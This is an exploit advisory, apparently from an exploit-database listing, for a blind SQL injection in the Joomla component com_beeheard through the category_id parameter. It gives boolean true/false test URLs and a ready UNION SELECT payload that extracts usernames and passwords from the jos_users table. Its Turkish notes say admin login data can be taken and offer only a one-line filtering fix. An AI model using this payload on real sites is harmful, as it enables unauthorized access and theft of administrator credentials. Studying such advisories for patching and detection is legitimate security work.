23 lines
No EOL
917 B
Text
Executable file
23 lines
No EOL
917 B
Text
Executable file
[++] Joomla Component com_beeheard Blind SQL injection Vulnerability
|
|
[++] author : FL0RiX
|
|
[++] Name : com_beeheard
|
|
[++] Bug Type : (Blind) SQL Injection
|
|
[++] Infection : Admin login bilgileri alınabilir.
|
|
[++] Demo Vuln. :
|
|
|
|
TRUE(+)
|
|
» http://server/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=1
|
|
FALSE(-)
|
|
» http://server/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=0
|
|
|
|
[++] Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
|
|
|
|
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=null/**/and/**/1=0/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixforever,5,6,7,8,9/**/from/**/jos_users--
|
|
|
|
< -- bug code end of -- > |